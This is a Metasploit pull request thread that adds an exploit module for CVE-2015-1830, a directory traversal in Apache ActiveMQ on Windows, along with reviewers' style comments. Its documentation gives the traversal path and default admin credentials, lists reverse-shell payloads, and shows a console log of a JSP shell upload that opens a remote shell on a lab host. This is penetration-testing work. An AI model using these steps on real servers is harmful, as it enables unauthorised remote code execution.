Add apache_activemq_traversal_upload module to /modules/exploits/windows/http/
rapid7/metasploit-framework pull request #12910
Opened 2020-02-04 10:25 UTC by kalba-security

## About
This change adds a new module to /modules/exploits/windows/http/ that can be used to exploit a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. The change also adds documentation for this module. For more information about this vulnerability, please check the documentation file or [https://www.cvedetails.com/cve/CVE-2015-1830/](url).

## Vulnerable System
Apache ActiveMQ 5.x before 5.11.2 for Windows.

## Verification Steps
1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/windows/http/apache_activemq_traversal_upload`
4. Do: `set RHOSTS [IP]`
5. Do: `set payload [payload]`
6. Do: `set LHOST [IP]`
7. Do: `exploit`

## Options
1.  `PASSWORD`. The default setting is `admin`.
2.  `PATH`. This option is the traversal path. `/fileserver/..\admin\` by default.
3.  `Proxies`. This option is not set by default.
4.  `RHOSTS`. To use: `set RHOSTS [IP]`
5.  `RPORT`. The default setting is `8161`. To use: `set RPORT [PORT]`
6.  `SSL`. The default setting is `false`.
7.  `THREADS`. The default setting is `1`.
8.  `USERNAME`. The default setting is `admin`.
9.  `VHOST`. This option is not set by default.
10. `TARGETURI`. This option is the base path. `/` by default.

## Compatible Payloads

0. `generic/custom`
1. `generic/shell_bind_tcp`
2. `generic/shell_reverse_tcp`
3. `java/jsp_shell_bind_tcp`
4. `java/jsp_shell_reverse_tcp`

## Payload Options
1. `LHOST`. To use: `set LHOST [IP]`
2. `LPORT`. The default setting is `4444`. To use: `set LPORT [PORT]`
3. `SHELL`. This option is not set by default.

## Scenarios

```
msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

   Name       Current Setting        Required  Description
   ----       ---------------        --------  -----------
   PASSWORD   admin                  yes       Password to authenticate with
   PATH       /fileserver/..\admin\  yes       Traversal path
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.2            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8161                   yes       The target port (TCP)
   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                      yes       The base path to the web application
   USERNAME   admin                  yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host

Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.

msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit

[*] Started reverse TCP handler on 192.168.1.1:4444 
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[*] Payload executed!
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>
```

2020-02-04 10:52 UTC, kalba-security commented
Does anyone have any idea why the travis-ci check failed? That makes no sense to me. I have added the module and documentation on two different systems running the latest metasploit version and it worked flawlessly each time.

2020-02-05 16:53 UTC, kalba-security commented
Hey FYI, vulnerable activemq versions for testing can be downloaded from [https://activemq.apache.org/download-archives](url). Installing one of those and testing the module should be rather quick.

2020-02-28 15:40 UTC, cbrnrd requested changes

2020-02-28 15:40 UTC, cbrnrd commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> +    print_status("loaded check")
This is unnecessary. If the user wants to run check, they know its running/loaded

2020-02-28 15:40 UTC, cbrnrd commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> +              'Arch' => ARCH_JAVA,
I know this is JSP, but does it actually affect the JRE running on the server? Not really sure if this is completely necessary.

2020-02-28 15:40 UTC, cbrnrd commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> +      'Name'           => 'Apache ActiveMQ directory traversal shell upload',
```suggestion
      'Name'           => 'Apache ActiveMQ Directory Traversal Shell Upload',
```

2020-02-28 15:40 UTC, cbrnrd commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> +    testurl = Rex::Text::rand_text_alpha(10)
This variable name is kind of misleading as it's the filename, not the url.

2020-02-28 15:40 UTC, cbrnrd commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> +      'Author'      => 'Erik Wynter', #@wyntererik
Did you discover the vulnerability or just write the module or both? Conventionally it is detailed in the comments.

2020-02-28 15:40 UTC, cbrnrd commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> +      'Name'           => 'Apache ActiveMQ directory traversal shell upload',
Also specify a version of Apache ActiveMQ if possible

2020-02-28 15:40 UTC, cbrnrd commented on documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
> +```
What is this scenario? What kind of machine/software version is the target running?

2020-02-28 15:40 UTC, cbrnrd commented on documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
> +## Payload Options
I don't see this section as necessary. There is also no default payload.

2020-02-28 15:40 UTC, cbrnrd commented on documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
> +## Options
It might be unclear to a reader as to what these options actually do. Add a short description to each option (as well as state the default value).

2020-02-28 15:40 UTC, cbrnrd commented on documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
> +6. Do: `set LHOST [IP]`
Consistency:
```
4. Do: `set RHOSTS [IP]`
5. Do: `set PAYLOAD [payload]`
6. Do: `set LHOST [IP]`
```
or
```
4. Do: `set rhosts [IP]`
5. Do: `set payload [payload]`
6. Do: `set lhost [IP]`
```

2020-02-28 15:40 UTC, cbrnrd commented on documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
> +1. Install the module as usual
This isn't necessary. If it's merged it will be included in the framework and won't have to be installed.

2020-02-28 15:40 UTC, cbrnrd commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> + def check
Whitespace. This line should be indented 2 spaces and everything in the function should be adjusted accordingly.

2020-02-28 15:40 UTC, cbrnrd commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> +      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
Indent this 2 spaces

2020-02-28 15:40 UTC, cbrnrd commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> +    res = send_request_cgi({
This doesn't need to be saved as a variable if you're not referencing it

2020-02-28 16:32 UTC, dwelch-r7 commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
> +              'Arch' => ARCH_JAVA,
The Arch affects what payloads are available to be selected when running the module, this looks like the right choice

2020-02-28 17:00 UTC, dwelch-r7 commented
> Hey FYI, vulnerable activemq versions for testing can be downloaded from [https://activemq.apache.org/download-archives](url). Installing one of those and testing the module should be rather quick.

Was able to test, works well, thanks for your contribution
Are you still interested in working on this PR with us?

2020-02-28 20:59 UTC, kalba-security commented
> > Hey FYI, vulnerable activemq versions for testing can be downloaded from [https://activemq.apache.org/download-archives](url). Installing one of those and testing the module should be rather quick.
> 
> Was able to test, works well, thanks for your contribution
> Are you still interested in working on this PR with us?

Hey yeah sure! I'm glad it's finally being reviewed. I could commit all the issues mentioned so far on Monday or Tuesday. I won't have time before then unfortunately.
FYI I wrote only the module and will make sure to add a reference to the original exploit and it's author. Also, I'm pretty sure this exploit only works with Java payloads, but I could run some more tests.

2020-03-02 10:49 UTC, dwelch-r7 commented
@kalba-security that sounds great thanks!

2020-03-03 18:21 UTC, kalba-security commented
@dwelch-r7 I think this should cover all suggestions from the code review. Please let me know if I can help with anything else.

2020-03-04 13:42 UTC, dwelch-r7 commented on modules/exploits/windows/http/apache_activemq_traversal_upload.rb
>          This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the tra
@kalba-security If you could just split this description up a bit I think that's the last thing and then I'd be good to land it

2020-03-05 15:05 UTC, merged

2020-03-05 15:08 UTC, dwelch-r7 commented
# Release Notes

This adds a module to exploit CVE-2015-1830 which is a directory traversal vulnerability in Apache Activemq on Windows by uploading and then executing a JSP file